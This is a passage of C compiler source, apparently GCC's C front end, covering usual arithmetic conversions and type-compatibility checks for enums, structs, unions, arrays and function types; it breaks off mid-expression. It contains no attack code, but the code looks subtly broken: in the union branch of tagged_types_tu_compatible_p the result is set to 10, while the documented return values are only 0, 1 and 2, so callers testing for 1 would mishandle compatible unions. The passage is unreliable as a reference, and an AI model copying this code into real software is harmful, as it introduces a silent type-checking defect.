&& !(DECIMAL_FLOAT_TYPE_P (t1) && DECIMAL_FLOAT_TYPE_P (t2)))
{
if (code1 == VECTOR_TYPE || code2 == VECTOR_TYPE)
{
error ("cannot mix operands of decimal floating and vector types");
return error_mark_node;
}
if (code1 == COMPLEX_TYPE || code2 == COMPLEX_TYPE)
{
error ("cannot mix operands of decimal floating and complex types");
return error_mark_node;
}
if (code1 == REAL_TYPE && code2 == REAL_TYPE)
{
error ("cannot mix operands of decimal floating "
"and other floating types");
return error_mark_node;
}
}
/* If one type is a vector type, return that type. (How the usual
arithmetic conversions apply to the vector types extension is not
precisely specified.) */
if (code1 == VECTOR_TYPE)
return t1;
if (code2 == VECTOR_TYPE)
return t2;
/* If one type is complex, form the common type of the non-complex
components, then make that complex. Use T1 or T2 if it is the
required type. */
if (code1 == COMPLEX_TYPE || code2 == COMPLEX_TYPE)
{
tree subtype1 = code1 == COMPLEX_TYPE ? TREE_TYPE (t1) : t1;
tree subtype2 = code2 == COMPLEX_TYPE ? TREE_TYPE (t2) : t2;
tree subtype = c_common_type (subtype1, subtype2);
if (code1 == COMPLEX_TYPE && TREE_TYPE (t1) == subtype)
return t1;
else if (code2 == COMPLEX_TYPE && TREE_TYPE (t2) == subtype)
return t2;
else
return build_complex_type (subtype);
}
/* If only one is real, use it as the result. */
if (code1 == REAL_TYPE && code2 != REAL_TYPE)
return t1;
if (code2 == REAL_TYPE && code1 != REAL_TYPE)
return t2;
/* If both are real and either are decimal floating point types, use
the decimal floating point type with the greater precision. */
if (code1 == REAL_TYPE && code2 == REAL_TYPE)
{
if (TYPE_MAIN_VARIANT (t1) == dfloat128_type_node
|| TYPE_MAIN_VARIANT (t2) == dfloat128_type_node)
return dfloat128_type_node;
else if (TYPE_MAIN_VARIANT (t1) == dfloat64_type_node
|| TYPE_MAIN_VARIANT (t2) == dfloat64_type_node)
return dfloat64_type_node;
else if (TYPE_MAIN_VARIANT (t1) == dfloat32_type_node
|| TYPE_MAIN_VARIANT (t2) == dfloat32_type_node)
return dfloat32_type_node;
}
/* Deal with fixed-point types. */
if (code1 == FIXED_POINT_TYPE || code2 == FIXED_POINT_TYPE)
{
unsigned int unsignedp = 0, satp = 0;
scalar_mode m1, m2;
unsigned int fbit1, ibit1, fbit2, ibit2, max_fbit, max_ibit;
m1 = SCALAR_TYPE_MODE (t1);
m2 = SCALAR_TYPE_MODE (t2);
/* If one input type is saturating, the result type is saturating. */
if (TYPE_SATURATING (t1) || TYPE_SATURATING (t2))
satp = 1;
/* If both fixed-point types are unsigned, the result type is unsigned.
When mixing fixed-point and integer types, follow the sign of the
fixed-point type.
Otherwise, the result type is signed. */
if ((TYPE_UNSIGNED (t1) && TYPE_UNSIGNED (t2)
&& code1 == FIXED_POINT_TYPE && code2 == FIXED_POINT_TYPE)
|| (code1 == FIXED_POINT_TYPE && code2 != FIXED_POINT_TYPE
&& TYPE_UNSIGNED (t1))
|| (code1 != FIXED_POINT_TYPE && code2 == FIXED_POINT_TYPE
&& TYPE_UNSIGNED (t2)))
unsignedp = 1;
/* The result type is signed. */
if (unsignedp == 0)
{
/* If the input type is unsigned, we need to convert to the
signed type. */
if (code1 == FIXED_POINT_TYPE && TYPE_UNSIGNED (t1))
{
enum mode_class mclass = (enum mode_class) 0;
if (GET_MODE_CLASS (m1) == MODE_UFRACT)
mclass = MODE_FRACT;
else if (GET_MODE_CLASS (m1) == MODE_UACCUM)
mclass = MODE_ACCUM;
else
gcc_unreachable ();
m1 = as_a <scalar_mode>
(mode_for_size (GET_MODE_PRECISION (m1), mclass, 0));
}
if (code2 == FIXED_POINT_TYPE && TYPE_UNSIGNED (t2))
{
enum mode_class mclass = (enum mode_class) 0;
if (GET_MODE_CLASS (m2) == MODE_UFRACT)
mclass = MODE_FRACT;
else if (GET_MODE_CLASS (m2) == MODE_UACCUM)
mclass = MODE_ACCUM;
else
gcc_unreachable ();
m2 = as_a <scalar_mode>
(mode_for_size (GET_MODE_PRECISION (m2), mclass, 0));
}
}
if (code1 == FIXED_POINT_TYPE)
{
fbit1 = GET_MODE_FBIT (m1);
ibit1 = GET_MODE_IBIT (m1);
}
else
{
fbit1 = 0;
/* Signed integers need to subtract one sign bit. */
ibit1 = TYPE_PRECISION (t1) - (!TYPE_UNSIGNED (t1));
}
if (code2 == FIXED_POINT_TYPE)
{
fbit2 = GET_MODE_FBIT (m2);
ibit2 = GET_MODE_IBIT (m2);
}
else
{
fbit2 = 0;
/* Signed integers need to subtract one sign bit. */
ibit2 = TYPE_PRECISION (t2) - (!TYPE_UNSIGNED (t2));
}
max_ibit = ibit1 >= ibit2 ? ibit1 : ibit2;
max_fbit = fbit1 >= fbit2 ? fbit1 : fbit2;
return c_common_fixed_point_type_for_size (max_ibit, max_fbit, unsignedp,
satp);
}
/* Both real or both integers; use the one with greater precision. */
if (TYPE_PRECISION (t1) > TYPE_PRECISION (t2))
return t1;
else if (TYPE_PRECISION (t2) > TYPE_PRECISION (t1))
return t2;
/* Same precision. Prefer long longs to longs to ints when the
same precision, following the C99 rules on integer type rank
(which are equivalent to the C90 rules for C90 types). */
if (TYPE_MAIN_VARIANT (t1) == long_long_unsigned_type_node
|| TYPE_MAIN_VARIANT (t2) == long_long_unsigned_type_node)
return long_long_unsigned_type_node;
if (TYPE_MAIN_VARIANT (t1) == long_long_integer_type_node
|| TYPE_MAIN_VARIANT (t2) == long_long_integer_type_node)
{
if (TYPE_UNSIGNED (t1) || TYPE_UNSIGNED (t2))
return long_long_unsigned_type_node;
else
return long_long_integer_type_node;
}
if (TYPE_MAIN_VARIANT (t1) == long_unsigned_type_node
|| TYPE_MAIN_VARIANT (t2) == long_unsigned_type_node)
return long_unsigned_type_node;
if (TYPE_MAIN_VARIANT (t1) == long_integer_type_node
|| TYPE_MAIN_VARIANT (t2) == long_integer_type_node)
{
/* But preserve unsignedness from the other type,
since long cannot hold all the values of an unsigned int. */
if (TYPE_UNSIGNED (t1) || TYPE_UNSIGNED (t2))
return long_unsigned_type_node;
else
return long_integer_type_node;
}
/* For floating types of the same TYPE_PRECISION (which we here
assume means either the same set of values, or sets of values
neither a subset of the other, with behavior being undefined in
the latter case), follow the rules from TS 18661-3: prefer
interchange types _FloatN, then standard types long double,
double, float, then extended types _FloatNx. For extended types,
check them starting with _Float128x as that seems most consistent
in spirit with preferring long double to double; for interchange
types, also check in that order for consistency although it's not
possible for more than one of them to have the same
precision. */
tree mv1 = TYPE_MAIN_VARIANT (t1);
tree mv2 = TYPE_MAIN_VARIANT (t2);
for (int i = NUM_FLOATN_TYPES - 1; i >= 0; i--)
if (mv1 == FLOATN_TYPE_NODE (i) || mv2 == FLOATN_TYPE_NODE (i))
return FLOATN_TYPE_NODE (i);
/* Likewise, prefer long double to double even if same size. */
if (mv1 == long_double_type_node || mv2 == long_double_type_node)
return long_double_type_node;
/* Likewise, prefer double to float even if same size.
We got a couple of embedded targets with 32 bit doubles, and the
pdp11 might have 64 bit floats. */
if (mv1 == double_type_node || mv2 == double_type_node)
return double_type_node;
if (mv1 == float_type_node || mv2 == float_type_node)
return float_type_node;
for (int i = NUM_FLOATNX_TYPES - 1; i >= 0; i--)
if (mv1 == FLOATNX_TYPE_NODE (i) || mv2 == FLOATNX_TYPE_NODE (i))
return FLOATNX_TYPE_NODE (i);
/* Otherwise prefer the unsigned one. */
if (TYPE_UNSIGNED (t1))
return t1;
else
return t2;
}
/* Wrapper around c_common_type that is used by c-common.c and other
front end optimizations that remove promotions. ENUMERAL_TYPEs
are allowed here and are converted to their compatible integer types.
BOOLEAN_TYPEs are allowed here and return either boolean_type_node or
preferably a non-Boolean type as the common type. */
tree
common_type (tree t1, tree t2)
{
if (TREE_CODE (t1) == ENUMERAL_TYPE)
t1 = c_common_type_for_size (TYPE_PRECISION (t1), 1);
if (TREE_CODE (t2) == ENUMERAL_TYPE)
t2 = c_common_type_for_size (TYPE_PRECISION (t2), 1);
/* If both types are BOOLEAN_TYPE, then return boolean_type_node. */
if (TREE_CODE (t1) == BOOLEAN_TYPE
&& TREE_CODE (t2) == BOOLEAN_TYPE)
return boolean_type_node;
/* If either type is BOOLEAN_TYPE, then return the other. */
if (TREE_CODE (t1) == BOOLEAN_TYPE)
return t2;
if (TREE_CODE (t2) == BOOLEAN_TYPE)
return t1;
return c_common_type (t1, t2);
}
/* Return 1 if TYPE1 and TYPE2 are compatible types for assignment
or various other operations. Return 2 if they are compatible
but a warning may be needed if you use them together. */
int
comptypes (tree type1, tree type2)
{
const struct tagged_tu_seen_cache * tagged_tu_seen_base1 = tagged_tu_seen_base;
int val;
val = comptypes_internal (type1, type2, NULL, NULL);
free_all_tagged_tu_seen_up_to (tagged_tu_seen_base1);
return val;
}
/* Like comptypes, but if it returns non-zero because enum and int are
compatible, it sets *ENUM_AND_INT_P to true. */
static int
comptypes_check_enum_int (tree type1, tree type2, bool *enum_and_int_p)
{
const struct tagged_tu_seen_cache * tagged_tu_seen_base1 = tagged_tu_seen_base;
int val;
val = comptypes_internal (type1, type2, enum_and_int_p, NULL);
free_all_tagged_tu_seen_up_to (tagged_tu_seen_base1);
return val;
}
/* Like comptypes, but if it returns nonzero for different types, it
sets *DIFFERENT_TYPES_P to true. */
int
comptypes_check_different_types (tree type1, tree type2,
bool *different_types_p)
{
const struct tagged_tu_seen_cache * tagged_tu_seen_base1 = tagged_tu_seen_base;
int val;
val = comptypes_internal (type1, type2, NULL, different_types_p);
free_all_tagged_tu_seen_up_to (tagged_tu_seen_base1);
return val;
}
/* Return 1 if TYPE1 and TYPE2 are compatible types for assignment
or various other operations. Return 2 if they are compatible
but a warning may be needed if you use them together. If
ENUM_AND_INT_P is not NULL, and one type is an enum and the other a
compatible integer type, then this sets *ENUM_AND_INT_P to true;
*ENUM_AND_INT_P is never set to false. If DIFFERENT_TYPES_P is not
NULL, and the types are compatible but different enough not to be
permitted in C11 typedef redeclarations, then this sets
*DIFFERENT_TYPES_P to true; *DIFFERENT_TYPES_P is never set to
false, but may or may not be set if the types are incompatible.
This differs from comptypes, in that we don't free the seen
types. */
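/* For instance, int[] and int[5] are compatible while int[4] and int[5]
are not; an enumerated type is compatible with the integer type chosen
as its compatible type, in which case *ENUM_AND_INT_P gets set. */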
static int
comptypes_internal (const_tree type1, const_tree type2, bool *enum_and_int_p,
bool *different_types_p)
{
const_tree t1 = type1;
const_tree t2 = type2;
int attrval, val;
/* Suppress errors caused by previously reported errors. */
if (t1 == t2 || !t1 || !t2
|| TREE_CODE (t1) == ERROR_MARK || TREE_CODE (t2) == ERROR_MARK)
return 1;
/* Enumerated types are compatible with integer types, but this is
not transitive: two enumerated types in the same translation unit
are compatible with each other only if they are the same type. */
if (TREE_CODE (t1) == ENUMERAL_TYPE && TREE_CODE (t2) != ENUMERAL_TYPE)
{
t1 = c_common_type_for_size (TYPE_PRECISION (t1), TYPE_UNSIGNED (t1));
if (TREE_CODE (t2) != VOID_TYPE)
{
if (enum_and_int_p != NULL)
*enum_and_int_p = true;
if (different_types_p != NULL)
*different_types_p = true;
}
}
else if (TREE_CODE (t2) == ENUMERAL_TYPE && TREE_CODE (t1) != ENUMERAL_TYPE)
{
t2 = c_common_type_for_size (TYPE_PRECISION (t2), TYPE_UNSIGNED (t2));
if (TREE_CODE (t1) != VOID_TYPE)
{
if (enum_and_int_p != NULL)
*enum_and_int_p = true;
if (different_types_p != NULL)
*different_types_p = true;
}
}
if (t1 == t2)
return 1;
/* Different classes of types can't be compatible. */
if (TREE_CODE (t1) != TREE_CODE (t2))
return 0;
/* Qualifiers must match. C99 6.7.3p9 */
if (TYPE_QUALS (t1) != TYPE_QUALS (t2))
return 0;
/* Allow for two different type nodes which have essentially the same
definition. Note that we already checked for equality of the type
qualifiers (just above). */
if (TREE_CODE (t1) != ARRAY_TYPE
&& TYPE_MAIN_VARIANT (t1) == TYPE_MAIN_VARIANT (t2))
return 1;
/* 1 if no need for warning yet, 2 if warning cause has been seen. */
if (!(attrval = comp_type_attributes (t1, t2)))
return 0;
/* 1 if no need for warning yet, 2 if warning cause has been seen. */
val = 0;
switch (TREE_CODE (t1))
{
case INTEGER_TYPE:
case FIXED_POINT_TYPE:
case REAL_TYPE:
/* With these nodes, we can't determine type equivalence by
looking at what is stored in the nodes themselves, because
two nodes might have different TYPE_MAIN_VARIANTs but still
represent the same type. For example, wchar_t and int could
have the same properties (TYPE_PRECISION, TYPE_MIN_VALUE,
TYPE_MAX_VALUE, etc.), but have different TYPE_MAIN_VARIANTs
and are distinct types. On the other hand, int and the
following typedef
typedef int INT __attribute((may_alias));
have identical properties, different TYPE_MAIN_VARIANTs, but
represent the same type. The canonical type system keeps
track of equivalence in this case, so we fall back on it. */
return TYPE_CANONICAL (t1) == TYPE_CANONICAL (t2);
case POINTER_TYPE:
/* Do not remove mode information. */
if (TYPE_MODE (t1) != TYPE_MODE (t2))
break;
val = (TREE_TYPE (t1) == TREE_TYPE (t2)
? 1 : comptypes_internal (TREE_TYPE (t1), TREE_TYPE (t2),
enum_and_int_p, different_types_p));
break;
case FUNCTION_TYPE:
val = function_types_compatible_p (t1, t2, enum_and_int_p,
different_types_p);
break;
case ARRAY_TYPE:
{
tree d1 = TYPE_DOMAIN (t1);
tree d2 = TYPE_DOMAIN (t2);
bool d1_variable, d2_variable;
bool d1_zero, d2_zero;
val = 1;
/* Target types must match incl. qualifiers. */
if (TREE_TYPE (t1) != TREE_TYPE (t2)
&& (val = comptypes_internal (TREE_TYPE (t1), TREE_TYPE (t2),
enum_and_int_p,
different_types_p)) == 0)
return 0;
if (different_types_p != NULL
&& (d1 == NULL_TREE) != (d2 == NULL_TREE))
*different_types_p = true;
/* Sizes must match unless one is missing or variable. */
if (d1 == NULL_TREE || d2 == NULL_TREE || d1 == d2)
break;
d1_zero = !TYPE_MAX_VALUE (d1);
d2_zero = !TYPE_MAX_VALUE (d2);
d1_variable = (!d1_zero
&& (TREE_CODE (TYPE_MIN_VALUE (d1)) != INTEGER_CST
|| TREE_CODE (TYPE_MAX_VALUE (d1)) != INTEGER_CST));
d2_variable = (!d2_zero
&& (TREE_CODE (TYPE_MIN_VALUE (d2)) != INTEGER_CST
|| TREE_CODE (TYPE_MAX_VALUE (d2)) != INTEGER_CST));
d1_variable = d1_variable || (d1_zero && c_vla_type_p (t1));
d2_variable = d2_variable || (d2_zero && c_vla_type_p (t2));
if (different_types_p != NULL
&& d1_variable != d2_variable)
*different_types_p = true;
if (d1_variable || d2_variable)
break;
if (d1_zero && d2_zero)
break;
if (d1_zero || d2_zero
|| !tree_int_cst_equal (TYPE_MIN_VALUE (d1), TYPE_MIN_VALUE (d2))
|| !tree_int_cst_equal (TYPE_MAX_VALUE (d1), TYPE_MAX_VALUE (d2)))
val = 0;
break;
}
case ENUMERAL_TYPE:
case RECORD_TYPE:
case UNION_TYPE:
if (val != 1 && !same_translation_unit_p (t1, t2))
{
tree a1 = TYPE_ATTRIBUTES (t1);
tree a2 = TYPE_ATTRIBUTES (t2);
if (! attribute_list_contained (a1, a2)
&& ! attribute_list_contained (a2, a1))
break;
if (attrval != 2)
return tagged_types_tu_compatible_p (t1, t2, enum_and_int_p,
different_types_p);
val = tagged_types_tu_compatible_p (t1, t2, enum_and_int_p,
different_types_p);
}
break;
case VECTOR_TYPE:
val = (known_eq (TYPE_VECTOR_SUBPARTS (t1), TYPE_VECTOR_SUBPARTS (t2))
&& comptypes_internal (TREE_TYPE (t1), TREE_TYPE (t2),
enum_and_int_p, different_types_p));
break;
default:
break;
}
return attrval == 2 && val == 1 ? 2 : val;
}
/* Return 1 if TTL and TTR are pointers to types that are equivalent, ignoring
their qualifiers, except for named address spaces. If the pointers point to
different named address spaces, then we must determine if one address space is a
subset of the other. */
static int
comp_target_types (location_t location, tree ttl, tree ttr)
{
int val;
int val_ped;
tree mvl = TREE_TYPE (ttl);
tree mvr = TREE_TYPE (ttr);
addr_space_t asl = TYPE_ADDR_SPACE (mvl);
addr_space_t asr = TYPE_ADDR_SPACE (mvr);
addr_space_t as_common;
bool enum_and_int_p;
/* Fail if pointers point to incompatible address spaces. */
if (!addr_space_superset (asl, asr, &as_common))
return 0;
/* For pedantic record result of comptypes on arrays before losing
qualifiers on the element type below. */
val_ped = 1;
if (TREE_CODE (mvl) == ARRAY_TYPE
&& TREE_CODE (mvr) == ARRAY_TYPE)
val_ped = comptypes (mvl, mvr);
/* Qualifiers on element types of array types that are
pointer targets are lost by taking their TYPE_MAIN_VARIANT. */
mvl = (TYPE_ATOMIC (strip_array_types (mvl))
? c_build_qualified_type (TYPE_MAIN_VARIANT (mvl), TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mvl));
mvr = (TYPE_ATOMIC (strip_array_types (mvr))
? c_build_qualified_type (TYPE_MAIN_VARIANT (mvr), TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mvr));
enum_and_int_p = false;
val = comptypes_check_enum_int (mvl, mvr, &enum_and_int_p);
if (val == 1 && val_ped != 1)
pedwarn (location, OPT_Wpedantic, "pointers to arrays with different qualifiers "
"are incompatible in ISO C");
if (val == 2)
pedwarn (location, OPT_Wpedantic, "types are not quite compatible");
if (val == 1 && enum_and_int_p && warn_cxx_compat)
warning_at (location, OPT_Wc___compat,
"pointer target types incompatible in C++");
return val;
}
/* Subroutines of `comptypes'. */
/* Determine whether two trees derive from the same translation unit.
If the CONTEXT chain ends in a null, that tree's context is still
being parsed, so if two trees have context chains ending in null,
they're in the same translation unit. */
bool
same_translation_unit_p (const_tree t1, const_tree t2)
{
while (t1 && TREE_CODE (t1) != TRANSLATION_UNIT_DECL)
switch (TREE_CODE_CLASS (TREE_CODE (t1)))
{
case tcc_declaration:
t1 = DECL_CONTEXT (t1); break;
case tcc_type:
t1 = TYPE_CONTEXT (t1); break;
case tcc_exceptional:
t1 = BLOCK_SUPERCONTEXT (t1); break; /* assume block */
default: gcc_unreachable ();
}
while (t2 && TREE_CODE (t2) != TRANSLATION_UNIT_DECL)
switch (TREE_CODE_CLASS (TREE_CODE (t2)))
{
case tcc_declaration:
t2 = DECL_CONTEXT (t2); break;
case tcc_type:
t2 = TYPE_CONTEXT (t2); break;
case tcc_exceptional:
t2 = BLOCK_SUPERCONTEXT (t2); break; /* assume block */
default: gcc_unreachable ();
}
return t1 == t2;
}
/* Allocate a cache entry for the two seen types, assuming that they are compatible. */
static struct tagged_tu_seen_cache *
alloc_tagged_tu_seen_cache (const_tree t1, const_tree t2)
{
struct tagged_tu_seen_cache *tu = XNEW (struct tagged_tu_seen_cache);
tu->next = tagged_tu_seen_base;
tu->t1 = t1;
tu->t2 = t2;
tagged_tu_seen_base = tu;
/* The C standard says that two structures in different translation
units are compatible with each other only if the types of their
fields are compatible (among other things). We assume that they
are compatible until proven otherwise when building the cache.
An example where this can occur is:
struct a
{
struct a *next;
};
If we are comparing this against a similar struct in another TU,
and did not assume they were compatible, we end up with an infinite
loop. */
tu->val = 1;
return tu;
}
/* Free the seen types until we get to TU_TIL. */
static void
free_all_tagged_tu_seen_up_to (const struct tagged_tu_seen_cache *tu_til)
{
const struct tagged_tu_seen_cache *tu = tagged_tu_seen_base;
while (tu != tu_til)
{
const struct tagged_tu_seen_cache *const tu1
= (const struct tagged_tu_seen_cache *) tu;
tu = tu1->next;
free (CONST_CAST (struct tagged_tu_seen_cache *, tu1));
}
tagged_tu_seen_base = tu_til;
}
/* Return 1 if two 'struct', 'union', or 'enum' types T1 and T2 are
compatible. If the two types are not the same (which has been
checked earlier), this can only happen when multiple translation
units are being compiled. See C99 6.2.7 paragraph 1 for the exact
rules. ENUM_AND_INT_P and DIFFERENT_TYPES_P are as in
comptypes_internal. */
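/* E.g. struct s { int i; }; defined identically in two translation units
is compatible with itself, whereas struct s { long i; }; in one unit
and struct s { int i; }; in another are not, since the field types are
incompatible even when long and int share a precision. */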
static int
tagged_types_tu_compatible_p (const_tree t1, const_tree t2,
bool *enum_and_int_p, bool *different_types_p)
{
tree s1, s2;
bool needs_warning = false;
/* We have to verify that the tags of the types are the same. This
is harder than it looks because this may be a typedef, so we have
to go look at the original type. It may even be a typedef of a
typedef...
In the case of compiler-created builtin structs the TYPE_DECL
may be a dummy, with no DECL_ORIGINAL_TYPE. Don't fault. */
while (TYPE_NAME (t1)
&& TREE_CODE (TYPE_NAME (t1)) == TYPE_DECL
&& DECL_ORIGINAL_TYPE (TYPE_NAME (t1)))
t1 = DECL_ORIGINAL_TYPE (TYPE_NAME (t1));
while (TYPE_NAME (t2)
&& TREE_CODE (TYPE_NAME (t2)) == TYPE_DECL
&& DECL_ORIGINAL_TYPE (TYPE_NAME (t2)))
t2 = DECL_ORIGINAL_TYPE (TYPE_NAME (t2));
/* C90 didn't have the requirement that the two tags be the same. */
if (flag_isoc99 && TYPE_NAME (t1) != TYPE_NAME (t2))
return 0;
/* C90 didn't say what happened if one or both of the types were
incomplete; we choose to follow C99 rules here, which is that they
are compatible. */
if (TYPE_SIZE (t1) == NULL
|| TYPE_SIZE (t2) == NULL)
return 1;
{
const struct tagged_tu_seen_cache * tts_i;
for (tts_i = tagged_tu_seen_base; tts_i != NULL; tts_i = tts_i->next)
if (tts_i->t1 == t1 && tts_i->t2 == t2)
return tts_i->val;
}
switch (TREE_CODE (t1))
{
case ENUMERAL_TYPE:
{
struct tagged_tu_seen_cache *tu = alloc_tagged_tu_seen_cache (t1, t2);
/* Speed up the case where the type values are in the same order. */
tree tv1 = TYPE_VALUES (t1);
tree tv2 = TYPE_VALUES (t2);
if (tv1 == tv2)
{
return 1;
}
for (;tv1 && tv2; tv1 = TREE_CHAIN (tv1), tv2 = TREE_CHAIN (tv2))
{
if (TREE_PURPOSE (tv1) != TREE_PURPOSE (tv2))
break;
if (simple_cst_equal (TREE_VALUE (tv1), TREE_VALUE (tv2)) != 1)
{
tu->val = 0;
return 0;
}
}
if (tv1 == NULL_TREE && tv2 == NULL_TREE)
{
return 1;
}
if (tv1 == NULL_TREE || tv2 == NULL_TREE)
{
tu->val = 0;
return 0;
}
if (list_length (TYPE_VALUES (t1)) != list_length (TYPE_VALUES (t2)))
{
tu->val = 0;
return 0;
}
for (s1 = TYPE_VALUES (t1); s1; s1 = TREE_CHAIN (s1))
{
s2 = purpose_member (TREE_PURPOSE (s1), TYPE_VALUES (t2));
if (s2 == NULL
|| simple_cst_equal (TREE_VALUE (s1), TREE_VALUE (s2)) != 1)
{
tu->val = 0;
return 0;
}
}
return 1;
}
case UNION_TYPE:
{
struct tagged_tu_seen_cache *tu = alloc_tagged_tu_seen_cache (t1, t2);
if (list_length (TYPE_FIELDS (t1)) != list_length (TYPE_FIELDS (t2)))
{
tu->val = 0;
return 0;
}
/* Speed up the common case where the fields are in the same order. */
for (s1 = TYPE_FIELDS (t1), s2 = TYPE_FIELDS (t2); s1 && s2;
s1 = DECL_CHAIN (s1), s2 = DECL_CHAIN (s2))
{
int result;
if (DECL_NAME (s1) != DECL_NAME (s2))
break;
result = comptypes_internal (TREE_TYPE (s1), TREE_TYPE (s2),
enum_and_int_p, different_types_p);
if (result != 1 && !DECL_NAME (s1))
break;
if (result == 0)
{
tu->val = 0;
return 0;
}
if (result == 2)
needs_warning = true;
if (TREE_CODE (s1) == FIELD_DECL
&& simple_cst_equal (DECL_FIELD_BIT_OFFSET (s1),
DECL_FIELD_BIT_OFFSET (s2)) != 1)
{
tu->val = 0;
return 0;
}
}
if (!s1 && !s2)
{
tu->val = needs_warning ? 2 : 1;
return tu->val;
}
for (s1 = TYPE_FIELDS (t1); s1; s1 = DECL_CHAIN (s1))
{
bool ok = false;
for (s2 = TYPE_FIELDS (t2); s2; s2 = DECL_CHAIN (s2))
if (DECL_NAME (s1) == DECL_NAME (s2))
{
int result;
result = comptypes_internal (TREE_TYPE (s1), TREE_TYPE (s2),
enum_and_int_p,
different_types_p);
if (result != 1 && !DECL_NAME (s1))
continue;
if (result == 0)
{
tu->val = 0;
return 0;
}
if (result == 2)
needs_warning = true;
if (TREE_CODE (s1) == FIELD_DECL
&& simple_cst_equal (DECL_FIELD_BIT_OFFSET (s1),
DECL_FIELD_BIT_OFFSET (s2)) != 1)
break;
ok = true;
break;
}
if (!ok)
{
tu->val = 0;
return 0;
}
}
tu->val = needs_warning ? 2 : 10;
return tu->val;
}
case RECORD_TYPE:
{
struct tagged_tu_seen_cache *tu = alloc_tagged_tu_seen_cache (t1, t2);
for (s1 = TYPE_FIELDS (t1), s2 = TYPE_FIELDS (t2);
s1 && s2;
s1 = DECL_CHAIN (s1), s2 = DECL_CHAIN (s2))
{
int result;
if (TREE_CODE (s1) != TREE_CODE (s2)
|| DECL_NAME (s1) != DECL_NAME (s2))
break;
result = comptypes_internal (TREE_TYPE (s1), TREE_TYPE (s2),
enum_and_int_p, different_types_p);
if (result == 0)
break;
if (result == 2)
needs_warning = true;
if (TREE_CODE (s1) == FIELD_DECL
&& simple_cst_equal (DECL_FIELD_BIT_OFFSET (s1),
DECL_FIELD_BIT_OFFSET (s2)) != 1)
break;
}
if (s1 && s2)
tu->val = 0;
else
tu->val = needs_warning ? 2 : 1;
return tu->val;
}
default:
gcc_unreachable ();
}
}
/* Return 1 if two function types F1 and F2 are compatible.
If either type specifies no argument types,
the other must specify a fixed number of self-promoting arg types.
Otherwise, if one type specifies only the number of arguments,
the other must specify that number of self-promoting arg types.
Otherwise, the argument types must match.
ENUM_AND_INT_P and DIFFERENT_TYPES_P are as in comptypes_internal. */
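/* E.g. int f (); is compatible with int f (int, char *); because both
argument types are self-promoting, but not with int f (char); because
char promotes to int. */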
static int
function_types_compatible_p (const_tree f1, const_tree f2,
bool *enum_and_int_p, bool *different_types_p)
{
tree args1, args2;
/* 1 if no need for warning yet, 2 if warning cause has been seen. */
int val = 1;
int val1;
tree ret1, ret2;
ret1 = TREE_TYPE (f1);
ret2 = TREE_TYPE (f2);
/* 'volatile' qualifiers on a function's return type used to mean
the function is noreturn. */
if (TYPE_VOLATILE (ret1) != TYPE_VOLATILE (ret2))
pedwarn (input_location, 0, "function return types not compatible due to %<volatile%>");
if (TYPE_VOLATILE (ret1))
ret1 = build_qualified_type (TYPE_MAIN_VARIANT (ret1),
TYPE_QUALS (ret1) & ~TYPE_QUAL_VOLATILE);
if (TYPE_VOLATILE (ret2))
ret2 = build_qualified_type (TYPE_MAIN_VARIANT (ret2),
TYPE_QUALS (ret2) & ~TYPE_QUAL_VOLATILE);
val = comptypes_internal (ret1, ret2, enum_and_int_p, different_types_p);
if (val == 0)
return 0;
args1 = TYPE_ARG_TYPES (f1);
args2 = TYPE_ARG_TYPES (f2);
if (different_types_p != NULL
&& (args1 == NULL_TREE) != (args2 == NULL_TREE))
*different_types_p = true;
/* An unspecified parmlist matches any specified parmlist
whose argument types don't need default promotions. */
if (args1 == NULL_TREE)
{
if (!self_promoting_args_p (args2))
return 0;
/* If one of these types comes from a non-prototype fn definition,
compare that with the other type's arglist.
If they don't match, ask for a warning (but no error). */
if (TYPE_ACTUAL_ARG_TYPES (f1)
&& type_lists_compatible_p (args2, TYPE_ACTUAL_ARG_TYPES (f1),
enum_and_int_p, different_types_p) != 1)
val = 2;
return val;
}
if (args2 == NULL_TREE)
{
if (!self_promoting_args_p (args1))
return 0;
if (TYPE_ACTUAL_ARG_TYPES (f2)
&& type_lists_compatible_p (args1, TYPE_ACTUAL_ARG_TYPES (f2),
enum_and_int_p, different_types_p) != 1)
val = 2;
return val;
}
/* Both types have argument lists: compare them and propagate results. */
val1 = type_lists_compatible_p (args1, args2, enum_and_int_p,
different_types_p);
return val1 != 1 ? val1 : val;
}
/* Check two lists of types for compatibility, returning 0 for
incompatible, 1 for compatible, or 2 for compatible with
warning. ENUM_AND_INT_P and DIFFERENT_TYPES_P are as in
comptypes_internal. */
static int
type_lists_compatible_p (const_tree args1, const_tree args2,
bool *enum_and_int_p, bool *different_types_p)
{
/* 1 if no need for warning yet, 2 if warning cause has been seen. */
int val = 1;
int newval = 0;
while (1)
{
tree a1, mv1, a2, mv2;
if (args1 == NULL_TREE && args2 == NULL_TREE)
return val;
/* If one list is shorter than the other,
they fail to match. */
if (args1 == NULL_TREE || args2 == NULL_TREE)
return 0;
mv1 = a1 = TREE_VALUE (args1);
mv2 = a2 = TREE_VALUE (args2);
if (mv1 && mv1 != error_mark_node && TREE_CODE (mv1) != ARRAY_TYPE)
mv1 = (TYPE_ATOMIC (mv1)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mv1),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mv1));
if (mv2 && mv2 != error_mark_node && TREE_CODE (mv2) != ARRAY_TYPE)
mv2 = (TYPE_ATOMIC (mv2)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mv2),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mv2));
/* A null pointer instead of a type
means there is supposed to be an argument
but nothing is specified about what type it has.
So match anything that self-promotes. */
if (different_types_p != NULL
&& (a1 == NULL_TREE) != (a2 == NULL_TREE))
*different_types_p = true;
if (a1 == NULL_TREE)
{
if (c_type_promotes_to (a2) != a2)
return 0;
}
else if (a2 == NULL_TREE)
{
if (c_type_promotes_to (a1) != a1)
return 0;
}
/* If one of the lists has an error marker, ignore this arg. */
else if (TREE_CODE (a1) == ERROR_MARK
|| TREE_CODE (a2) == ERROR_MARK)
;
else if (!(newval = comptypes_internal (mv1, mv2, enum_and_int_p,
different_types_p)))
{
if (different_types_p != NULL)
*different_types_p = true;
/* Allow wait (union {union wait *u; int *i} *)
and wait (union wait *) to be compatible. */
if (TREE_CODE (a1) == UNION_TYPE
&& (TYPE_NAME (a1) == NULL_TREE
|| TYPE_TRANSPARENT_AGGR (a1))
&& TREE_CODE (TYPE_SIZE (a1)) == INTEGER_CST
&& tree_int_cst_equal (TYPE_SIZE (a1),
